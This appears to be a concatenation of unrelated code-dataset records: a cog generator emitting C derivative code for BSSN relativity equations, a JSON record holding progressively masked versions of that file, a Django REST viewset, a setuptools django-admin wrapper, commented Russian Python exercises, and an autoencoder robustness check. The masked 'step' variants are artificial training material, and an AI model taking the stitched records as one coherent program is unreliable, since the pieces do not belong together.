""" Contains derivative computation for BSSN formulation of ET equations. """ # first derivative import cog D = ["alpha", "beta0", "beta1", "beta2", "B0", "B1", "B2", "chi", "Gt0", "Gt1", "Gt2", "K", "gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "At0", "At1", "At2", "At3", "At4", "At5" ] # custom functions for code generation in cse. custom_functions = {'grad': 'grad', 'grad2': 'grad2', 'agrad': 'agrad', 'kograd': 'kograd'} # second derivs required for RHS DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi", "alpha", "beta0", "beta1", "beta2" ] # advective derivatives AD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "At0", "At1", "At2", "At3", "At4", "At5", "alpha", "beta0", "beta1", "beta2", "chi", "Gt0", "Gt1", "Gt2", "K", "B0", "B1", "B2"] KO=AD # first derivs required for constraints--no gauge variables CONSTRAINT_D = [ "chi", "Gt0", "Gt1", "Gt2", "K", "gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "At0", "At1", "At2", "At3", "At4", "At5" ] # second derivs required for constraints--no gauge variables CONSTRAINT_DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi"] PREFIX_D = ["grad_0_", "grad_1_", "grad_2_"] PREFIX_AD = ["agrad_0_", "agrad_1_", "agrad_2_"] PREFIX_KOD = ["kograd_0_", "kograd_1_", "kograd_2_"] PREFIX_DD = ["grad2_0_0_", "grad2_0_1_", "grad2_0_2_", "grad2_1_1_", "grad2_1_2_", "grad2_2_2_"] # first derivative in i direction FUNC_D_I=[] for f in D: for p in PREFIX_D: FUNC_D_I.append(p+f) # second derivative in ij direction FUNC_D_IJ=[] for f in DD: for p in PREFIX_DD: FUNC_D_IJ.append(p+f) #advective derivative in i direction FUNC_AD_I=[] for f in AD: for p in PREFIX_AD: FUNC_AD_I.append(p+f) #Kriess-Oliger derivative in i direction FUNC_KOD_I=[] for f in D: for p in PREFIX_KOD: FUNC_KOD_I.append(p+f) FUNC_CONS=[] for f in CONSTRAINT_D: for p in PREFIX_D: FUNC_CONS.append(p+f) for f in CONSTRAINT_DD: for p in PREFIX_DD: FUNC_CONS.append(p+f) def allocDerivMemory(): for deriv in FUNC_D_I: cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);") for deriv in FUNC_D_IJ: cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);") for deriv in FUNC_AD_I: cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);") def computeRHSDerivs(): for var in D: cog.outl("\t deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_D[0] + var ,var)) cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_D[1] + var ,var)) cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_D[2] + var ,var)) if var in DD: cog.outl("\t deriv_xx(%s, %s, hx, sz, bflag);" %(PREFIX_DD[0] + var ,var)) cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_DD[1] + var , PREFIX_D[0] + var )) cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[2] + var , PREFIX_D[0] + var )) cog.outl("\t deriv_yy(%s, %s, hx, sz, bflag);" %(PREFIX_DD[3] + var ,var)) cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[4] + var , PREFIX_D[1] + var)) cog.outl("\t deriv_zz(%s, %s, hx, sz, bflag);" %(PREFIX_DD[5] + var ,var)) if var in AD: cog.outl("\t adv_deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_AD[0] + var ,var)) cog.outl("\t adv_deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_AD[1] + var ,var)) cog.outl("\t adv_deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_AD[2] + var ,var)) def deallocDerivMemory(): for deriv in FUNC_D_I: cog.outl("\t free(%s);" %(deriv)) for deriv in FUNC_D_IJ: cog.outl("\t free(%s);" %(deriv)) for deriv in FUNC_AD_I: cog.outl("\t free(%s);" %(deriv))
normal
{ "blob_id": "20a238826640099e6c69aaa383c5fa7e9b02b13b", "index": 5614, "step-1": "<mask token>\n\n\ndef allocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_D_IJ:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_AD_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n\n\ndef computeRHSDerivs():\n for var in D:\n cog.outl('\\t deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_D[0] + var,\n var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_D[1] + var,\n var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_D[2] + var,\n var))\n if var in DD:\n cog.outl('\\t deriv_xx(%s, %s, hx, sz, bflag);' % (PREFIX_DD[0] +\n var, var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_DD[1] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[2] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_yy(%s, %s, hx, sz, bflag);' % (PREFIX_DD[3] +\n var, var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[4] +\n var, PREFIX_D[1] + var))\n cog.outl('\\t deriv_zz(%s, %s, hx, sz, bflag);' % (PREFIX_DD[5] +\n var, var))\n if var in AD:\n cog.outl('\\t adv_deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 0] + var, var))\n cog.outl('\\t adv_deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 1] + var, var))\n cog.outl('\\t adv_deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 2] + var, var))\n\n\ndef deallocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_D_IJ:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_AD_I:\n cog.outl('\\t free(%s);' % deriv)\n", "step-2": "<mask token>\nfor f in D:\n for p in PREFIX_D:\n FUNC_D_I.append(p + f)\n<mask token>\nfor f in DD:\n for p in PREFIX_DD:\n FUNC_D_IJ.append(p + f)\n<mask token>\nfor f in AD:\n for p in PREFIX_AD:\n FUNC_AD_I.append(p + f)\n<mask token>\nfor f in D:\n for p in PREFIX_KOD:\n FUNC_KOD_I.append(p + f)\n<mask token>\nfor f in CONSTRAINT_D:\n for p in PREFIX_D:\n FUNC_CONS.append(p + f)\nfor f in CONSTRAINT_DD:\n for p in PREFIX_DD:\n FUNC_CONS.append(p + f)\n\n\ndef allocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_D_IJ:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_AD_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n\n\ndef computeRHSDerivs():\n for var in D:\n cog.outl('\\t deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_D[0] + var,\n var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_D[1] + var,\n var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_D[2] + var,\n var))\n if var in DD:\n cog.outl('\\t deriv_xx(%s, %s, hx, sz, bflag);' % (PREFIX_DD[0] +\n var, var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_DD[1] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[2] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_yy(%s, %s, hx, sz, bflag);' % (PREFIX_DD[3] +\n var, var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[4] +\n var, PREFIX_D[1] + var))\n cog.outl('\\t deriv_zz(%s, %s, hx, sz, bflag);' % (PREFIX_DD[5] +\n var, var))\n if var in AD:\n cog.outl('\\t adv_deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 0] + var, var))\n cog.outl('\\t adv_deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 1] + var, var))\n cog.outl('\\t adv_deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 2] + var, var))\n\n\ndef deallocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_D_IJ:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_AD_I:\n cog.outl('\\t free(%s);' % deriv)\n", "step-3": "<mask token>\nD = ['alpha', 'beta0', 'beta1', 'beta2', 'B0', 'B1', 'B2', 'chi', 'Gt0',\n 'Gt1', 'Gt2', 'K', 'gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'At0',\n 'At1', 'At2', 'At3', 'At4', 'At5']\ncustom_functions = {'grad': 'grad', 'grad2': 'grad2', 'agrad': 'agrad',\n 'kograd': 'kograd'}\nDD = ['gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'chi', 'alpha', 'beta0',\n 'beta1', 'beta2']\nAD = ['gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'At0', 'At1', 'At2', 'At3',\n 'At4', 'At5', 'alpha', 'beta0', 'beta1', 'beta2', 'chi', 'Gt0', 'Gt1',\n 'Gt2', 'K', 'B0', 'B1', 'B2']\nKO = AD\nCONSTRAINT_D = ['chi', 'Gt0', 'Gt1', 'Gt2', 'K', 'gt0', 'gt1', 'gt2', 'gt3',\n 'gt4', 'gt5', 'At0', 'At1', 'At2', 'At3', 'At4', 'At5']\nCONSTRAINT_DD = ['gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'chi']\nPREFIX_D = ['grad_0_', 'grad_1_', 'grad_2_']\nPREFIX_AD = ['agrad_0_', 'agrad_1_', 'agrad_2_']\nPREFIX_KOD = ['kograd_0_', 'kograd_1_', 'kograd_2_']\nPREFIX_DD = ['grad2_0_0_', 'grad2_0_1_', 'grad2_0_2_', 'grad2_1_1_',\n 'grad2_1_2_', 'grad2_2_2_']\nFUNC_D_I = []\nfor f in D:\n for p in PREFIX_D:\n FUNC_D_I.append(p + f)\nFUNC_D_IJ = []\nfor f in DD:\n for p in PREFIX_DD:\n FUNC_D_IJ.append(p + f)\nFUNC_AD_I = []\nfor f in AD:\n for p in PREFIX_AD:\n FUNC_AD_I.append(p + f)\nFUNC_KOD_I = []\nfor f in D:\n for p in PREFIX_KOD:\n FUNC_KOD_I.append(p + f)\nFUNC_CONS = []\nfor f in CONSTRAINT_D:\n for p in PREFIX_D:\n FUNC_CONS.append(p + f)\nfor f in CONSTRAINT_DD:\n for p in PREFIX_DD:\n FUNC_CONS.append(p + f)\n\n\ndef allocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_D_IJ:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_AD_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n\n\ndef computeRHSDerivs():\n for var in D:\n cog.outl('\\t deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_D[0] + var,\n var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_D[1] + var,\n var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_D[2] + var,\n var))\n if var in DD:\n cog.outl('\\t deriv_xx(%s, %s, hx, sz, bflag);' % (PREFIX_DD[0] +\n var, var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_DD[1] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[2] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_yy(%s, %s, hx, sz, bflag);' % (PREFIX_DD[3] +\n var, var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[4] +\n var, PREFIX_D[1] + var))\n cog.outl('\\t deriv_zz(%s, %s, hx, sz, bflag);' % (PREFIX_DD[5] +\n var, var))\n if var in AD:\n cog.outl('\\t adv_deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 0] + var, var))\n cog.outl('\\t adv_deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 1] + var, var))\n cog.outl('\\t adv_deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 2] + var, var))\n\n\ndef deallocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_D_IJ:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_AD_I:\n cog.outl('\\t free(%s);' % deriv)\n", "step-4": "<mask token>\nimport cog\nD = ['alpha', 'beta0', 'beta1', 'beta2', 'B0', 'B1', 'B2', 'chi', 'Gt0',\n 'Gt1', 'Gt2', 'K', 'gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'At0',\n 'At1', 'At2', 'At3', 'At4', 'At5']\ncustom_functions = {'grad': 'grad', 'grad2': 'grad2', 'agrad': 'agrad',\n 'kograd': 'kograd'}\nDD = ['gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'chi', 'alpha', 'beta0',\n 'beta1', 'beta2']\nAD = ['gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'At0', 'At1', 'At2', 'At3',\n 'At4', 'At5', 'alpha', 'beta0', 'beta1', 'beta2', 'chi', 'Gt0', 'Gt1',\n 'Gt2', 'K', 'B0', 'B1', 'B2']\nKO = AD\nCONSTRAINT_D = ['chi', 'Gt0', 'Gt1', 'Gt2', 'K', 'gt0', 'gt1', 'gt2', 'gt3',\n 'gt4', 'gt5', 'At0', 'At1', 'At2', 'At3', 'At4', 'At5']\nCONSTRAINT_DD = ['gt0', 'gt1', 'gt2', 'gt3', 'gt4', 'gt5', 'chi']\nPREFIX_D = ['grad_0_', 'grad_1_', 'grad_2_']\nPREFIX_AD = ['agrad_0_', 'agrad_1_', 'agrad_2_']\nPREFIX_KOD = ['kograd_0_', 'kograd_1_', 'kograd_2_']\nPREFIX_DD = ['grad2_0_0_', 'grad2_0_1_', 'grad2_0_2_', 'grad2_1_1_',\n 'grad2_1_2_', 'grad2_2_2_']\nFUNC_D_I = []\nfor f in D:\n for p in PREFIX_D:\n FUNC_D_I.append(p + f)\nFUNC_D_IJ = []\nfor f in DD:\n for p in PREFIX_DD:\n FUNC_D_IJ.append(p + f)\nFUNC_AD_I = []\nfor f in AD:\n for p in PREFIX_AD:\n FUNC_AD_I.append(p + f)\nFUNC_KOD_I = []\nfor f in D:\n for p in PREFIX_KOD:\n FUNC_KOD_I.append(p + f)\nFUNC_CONS = []\nfor f in CONSTRAINT_D:\n for p in PREFIX_D:\n FUNC_CONS.append(p + f)\nfor f in CONSTRAINT_DD:\n for p in PREFIX_DD:\n FUNC_CONS.append(p + f)\n\n\ndef allocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_D_IJ:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n for deriv in FUNC_AD_I:\n cog.outl('\\t double* ' + deriv +\n ' = (double*)malloc(sizeof(double)*n);')\n\n\ndef computeRHSDerivs():\n for var in D:\n cog.outl('\\t deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_D[0] + var,\n var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_D[1] + var,\n var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_D[2] + var,\n var))\n if var in DD:\n cog.outl('\\t deriv_xx(%s, %s, hx, sz, bflag);' % (PREFIX_DD[0] +\n var, var))\n cog.outl('\\t deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_DD[1] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[2] +\n var, PREFIX_D[0] + var))\n cog.outl('\\t deriv_yy(%s, %s, hx, sz, bflag);' % (PREFIX_DD[3] +\n var, var))\n cog.outl('\\t deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_DD[4] +\n var, PREFIX_D[1] + var))\n cog.outl('\\t deriv_zz(%s, %s, hx, sz, bflag);' % (PREFIX_DD[5] +\n var, var))\n if var in AD:\n cog.outl('\\t adv_deriv_x(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 0] + var, var))\n cog.outl('\\t adv_deriv_y(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 1] + var, var))\n cog.outl('\\t adv_deriv_z(%s, %s, hx, sz, bflag);' % (PREFIX_AD[\n 2] + var, var))\n\n\ndef deallocDerivMemory():\n for deriv in FUNC_D_I:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_D_IJ:\n cog.outl('\\t free(%s);' % deriv)\n for deriv in FUNC_AD_I:\n cog.outl('\\t free(%s);' % deriv)\n", "step-5": "\"\"\"\nContains derivative computation for BSSN formulation of ET equations. \n\"\"\"\n\n# first derivative\nimport cog\n\nD = [\"alpha\", \"beta0\", \"beta1\", \"beta2\",\n \"B0\", \"B1\", \"B2\",\n \"chi\", \"Gt0\", \"Gt1\", \"Gt2\", \"K\",\n \"gt0\", \"gt1\", \"gt2\", \"gt3\", \"gt4\", \"gt5\",\n \"At0\", \"At1\", \"At2\", \"At3\", \"At4\", \"At5\" ]\n\n\n# custom functions for code generation in cse.\ncustom_functions = {'grad': 'grad', 'grad2': 'grad2', 'agrad': 'agrad', 'kograd': 'kograd'}\n\n# second derivs required for RHS\nDD = [\"gt0\", \"gt1\", \"gt2\", \"gt3\", \"gt4\", \"gt5\", \"chi\",\n \"alpha\", \"beta0\", \"beta1\", \"beta2\" ]\n\n# advective derivatives\nAD = [\"gt0\", \"gt1\", \"gt2\", \"gt3\", \"gt4\", \"gt5\",\n \"At0\", \"At1\", \"At2\", \"At3\", \"At4\", \"At5\",\n \"alpha\", \"beta0\", \"beta1\", \"beta2\", \"chi\", \"Gt0\", \"Gt1\", \"Gt2\", \"K\",\n \"B0\", \"B1\", \"B2\"] \n\nKO=AD\n\n# first derivs required for constraints--no gauge variables\nCONSTRAINT_D = [ \"chi\", \"Gt0\", \"Gt1\", \"Gt2\", \"K\",\n \"gt0\", \"gt1\", \"gt2\", \"gt3\", \"gt4\", \"gt5\",\n \"At0\", \"At1\", \"At2\", \"At3\", \"At4\", \"At5\" ]\n\n# second derivs required for constraints--no gauge variables\nCONSTRAINT_DD = [\"gt0\", \"gt1\", \"gt2\", \"gt3\", \"gt4\", \"gt5\", \"chi\"]\n\n\nPREFIX_D = [\"grad_0_\", \"grad_1_\", \"grad_2_\"]\nPREFIX_AD = [\"agrad_0_\", \"agrad_1_\", \"agrad_2_\"]\nPREFIX_KOD = [\"kograd_0_\", \"kograd_1_\", \"kograd_2_\"]\nPREFIX_DD = [\"grad2_0_0_\", \"grad2_0_1_\", \"grad2_0_2_\", \"grad2_1_1_\", \"grad2_1_2_\", \"grad2_2_2_\"]\n\n# first derivative in i direction\nFUNC_D_I=[]\nfor f in D:\n for p in PREFIX_D:\n FUNC_D_I.append(p+f)\n\n# second derivative in ij direction\nFUNC_D_IJ=[]\nfor f in DD:\n for p in PREFIX_DD:\n FUNC_D_IJ.append(p+f)\n\n#advective derivative in i direction\nFUNC_AD_I=[]\nfor f in AD:\n for p in PREFIX_AD:\n FUNC_AD_I.append(p+f)\n\n\n#Kriess-Oliger derivative in i direction\nFUNC_KOD_I=[]\nfor f in D:\n for p in PREFIX_KOD:\n FUNC_KOD_I.append(p+f)\n\nFUNC_CONS=[]\nfor f in CONSTRAINT_D:\n for p in PREFIX_D:\n FUNC_CONS.append(p+f)\n \nfor f in CONSTRAINT_DD:\n for p in PREFIX_DD:\n FUNC_CONS.append(p+f)\n\n\ndef allocDerivMemory():\n \n for deriv in FUNC_D_I:\n cog.outl(\"\\t double* \"+deriv+\" = (double*)malloc(sizeof(double)*n);\")\n\n for deriv in FUNC_D_IJ:\n cog.outl(\"\\t double* \"+deriv+\" = (double*)malloc(sizeof(double)*n);\")\n\n for deriv in FUNC_AD_I:\n cog.outl(\"\\t double* \"+deriv+\" = (double*)malloc(sizeof(double)*n);\")\n \n \ndef computeRHSDerivs():\n \n for var in D:\n cog.outl(\"\\t deriv_x(%s, %s, hx, sz, bflag);\" %(PREFIX_D[0] + var ,var))\n cog.outl(\"\\t deriv_y(%s, %s, hx, sz, bflag);\" %(PREFIX_D[1] + var ,var))\n cog.outl(\"\\t deriv_z(%s, %s, hx, sz, bflag);\" %(PREFIX_D[2] + var ,var))\n\n if var in DD:\n cog.outl(\"\\t deriv_xx(%s, %s, hx, sz, bflag);\" %(PREFIX_DD[0] + var ,var))\n cog.outl(\"\\t deriv_y(%s, %s, hx, sz, bflag);\" %(PREFIX_DD[1] + var , PREFIX_D[0] + var ))\n cog.outl(\"\\t deriv_z(%s, %s, hx, sz, bflag);\" %(PREFIX_DD[2] + var , PREFIX_D[0] + var ))\n\n cog.outl(\"\\t deriv_yy(%s, %s, hx, sz, bflag);\" %(PREFIX_DD[3] + var ,var))\n cog.outl(\"\\t deriv_z(%s, %s, hx, sz, bflag);\" %(PREFIX_DD[4] + var , PREFIX_D[1] + var))\n\n cog.outl(\"\\t deriv_zz(%s, %s, hx, sz, bflag);\" %(PREFIX_DD[5] + var ,var))\n\n if var in AD:\n cog.outl(\"\\t adv_deriv_x(%s, %s, hx, sz, bflag);\" %(PREFIX_AD[0] + var ,var))\n cog.outl(\"\\t adv_deriv_y(%s, %s, hx, sz, bflag);\" %(PREFIX_AD[1] + var ,var))\n cog.outl(\"\\t adv_deriv_z(%s, %s, hx, sz, bflag);\" %(PREFIX_AD[2] + var ,var))\n\n\n\ndef deallocDerivMemory():\n \n for deriv in FUNC_D_I:\n cog.outl(\"\\t free(%s);\" %(deriv))\n\n for deriv in FUNC_D_IJ:\n cog.outl(\"\\t free(%s);\" %(deriv))\n\n for deriv in FUNC_AD_I:\n cog.outl(\"\\t free(%s);\" %(deriv))\n\n\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
from . import * from rest_framework import permissions from core.serializers import CategorySerializer from core.models.category_model import Category class CategoryViewSet(viewsets.ModelViewSet): serializer_class = CategorySerializer queryset = Category.objects.all() def get_permissions(self): permission_classes = (permissions.AllowAny,) return [permission() for permission in permission_classes]
normal
{ "blob_id": "5723e7889663142832a8131bb5f4c35d29692a49", "index": 6325, "step-1": "<mask token>\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n <mask token>\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n <mask token>\n <mask token>\n\n def get_permissions(self):\n permission_classes = permissions.AllowAny,\n return [permission() for permission in permission_classes]\n", "step-3": "<mask token>\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n serializer_class = CategorySerializer\n queryset = Category.objects.all()\n\n def get_permissions(self):\n permission_classes = permissions.AllowAny,\n return [permission() for permission in permission_classes]\n", "step-4": "from . import *\nfrom rest_framework import permissions\nfrom core.serializers import CategorySerializer\nfrom core.models.category_model import Category\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n serializer_class = CategorySerializer\n queryset = Category.objects.all()\n\n def get_permissions(self):\n permission_classes = permissions.AllowAny,\n return [permission() for permission in permission_classes]\n", "step-5": "from . import *\nfrom rest_framework import permissions\n\nfrom core.serializers import CategorySerializer\nfrom core.models.category_model import Category\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n serializer_class = CategorySerializer\n queryset = Category.objects.all()\n\n def get_permissions(self):\n permission_classes = (permissions.AllowAny,)\n return [permission() for permission in permission_classes]\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
#!d:\python_projects\env2\scripts\python.exe # EASY-INSTALL-DEV-SCRIPT: 'Django==2.1.dev20180209010235','django-admin.py' __requires__ = 'Django==2.1.dev20180209010235' __import__('pkg_resources').require('Django==2.1.dev20180209010235') __file__ = 'D:\\python_projects\\ENV2\\django\\django\\bin\\django-admin.py' exec(compile(open(__file__).read(), __file__, 'exec'))
normal
{ "blob_id": "4bbf0a0fadc506ad3674912f1885525a94b5b1e9", "index": 2807, "step-1": "<mask token>\n", "step-2": "<mask token>\n__import__('pkg_resources').require('Django==2.1.dev20180209010235')\n<mask token>\nexec(compile(open(__file__).read(), __file__, 'exec'))\n", "step-3": "__requires__ = 'Django==2.1.dev20180209010235'\n__import__('pkg_resources').require('Django==2.1.dev20180209010235')\n__file__ = 'D:\\\\python_projects\\\\ENV2\\\\django\\\\django\\\\bin\\\\django-admin.py'\nexec(compile(open(__file__).read(), __file__, 'exec'))\n", "step-4": "#!d:\\python_projects\\env2\\scripts\\python.exe\n# EASY-INSTALL-DEV-SCRIPT: 'Django==2.1.dev20180209010235','django-admin.py'\n__requires__ = 'Django==2.1.dev20180209010235'\n__import__('pkg_resources').require('Django==2.1.dev20180209010235')\n__file__ = 'D:\\\\python_projects\\\\ENV2\\\\django\\\\django\\\\bin\\\\django-admin.py'\nexec(compile(open(__file__).read(), __file__, 'exec'))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
#dict1 = {"я":"i","люблю":"love","Питон":"Рython"} #user_input = input("---->") #print(dict1[user_input]) #list1 =[i for i in range(0,101) if i%7 ==0 if i%5 !=0] #print(list1) #stroka = "я обычная строка быть которая должна быть длиннее чем десять символ" #stroka1=stroka.split() #dict1={} #for i in stroka1: # dict1[i] = stroka.count(i) #print(dict1) # #ФУНКЦИИ ##1. ##def foo(): ## print("Мой любимый фильм ето ",input()) ##foo() ##2. ##import random ##def rand(): ## rn = random.randint(0,10) ## return rn ##x=rand() ##print(x) ##list1=[] ##for i in range(0,10): ## list1.append(rand()) ##print(list1) ##3. ##def arifm(*x): ## return(sum(x)/len(x)) ##print(arifm(1,2,4,5,6)) ##4. ##def dict2(x,y): ## return {x:y} ##dict1 = {} ##dict1.update(dict2("GB","London")) ##print(dict1) ##dict5 = {} ##dict5.update(dict2("Hungary","Budapest")) ##print(dict5)
normal
{ "blob_id": "c0512a90b6a4e50c41d630f6853d1244f78debfb", "index": 4350, "step-1": "#dict1 = {\"я\":\"i\",\"люблю\":\"love\",\"Питон\":\"Рython\"}\n#user_input = input(\"---->\")\n#print(dict1[user_input])\n\n\n#list1 =[i for i in range(0,101) if i%7 ==0 if i%5 !=0]\n#print(list1)\n\n\n\n#stroka = \"я обычная строка быть которая должна быть длиннее чем десять символ\"\n\n#stroka1=stroka.split()\n#dict1={}\n#for i in stroka1:\n# dict1[i] = stroka.count(i)\n#print(dict1)\n\n\n\n# #ФУНКЦИИ\n\n##1.\n##def foo():\n## print(\"Мой любимый фильм ето \",input())\n##foo()\n\n##2.\n##import random \n\n##def rand():\n## rn = random.randint(0,10)\n## return rn\n##x=rand()\n##print(x)\n\n##list1=[]\n\n##for i in range(0,10):\n## list1.append(rand())\n##print(list1)\n\n##3.\n##def arifm(*x):\n## return(sum(x)/len(x))\n##print(arifm(1,2,4,5,6))\n\n##4.\n##def dict2(x,y):\n## return {x:y}\n\n##dict1 = {}\n##dict1.update(dict2(\"GB\",\"London\"))\n##print(dict1)\n\n##dict5 = {}\n##dict5.update(dict2(\"Hungary\",\"Budapest\"))\n##print(dict5)\n\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 1 ] }
[ 1 ]
import pandas as pd import copy as cp import numpy as np from autoencoder import * from encoding import smtEncoding import matplotlib import matplotlib.pyplot as plt from data_generator import * from marabou_encoding import marabouEncoding def main(): ''' Trains an autoencoder on (generated) data and checks adversarial robustness ''' architecture = [10,5,10] # Change the architecture of the autoencoder according to requirement print('----------Training autoencoder----------') aut = autoencoder(architecture=architecture) data = pd.read_csv('datasets/sine_curve.csv', header=None) aut.train(data, epochs=20, learning_rate=0.01) if not aut.saveflag: aut.saveAE() print("Saving the autoencoder after training") #plot_output([data, aut.predict(data)], ['Original', 'Reconstructed']) print("------Checking properties of autoencoders-------") # Parameters that can be modified boundingBox = 1 # Region around origin where the properties need to checked prop1 = ['adversarial-example', 0.1] prop2 = ['adversarial-robustness', [1]*10, 0.1, 0.1] prop3 = ['fairness', 1, 0.1] enc = smtEncoding() counterExample = enc.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1) # For marabou mara = marabouEncoding() mara.checkProperties(autoencoder=aut, prop=prop2, boundingBox=1, folder = "Demo-aut/autoencoder.onnx") if counterExample == None: print("Autoencoder satisfies property is the given region") else: print("Autoencoder does not satisfy property in the given region for", counterExample) main()
normal
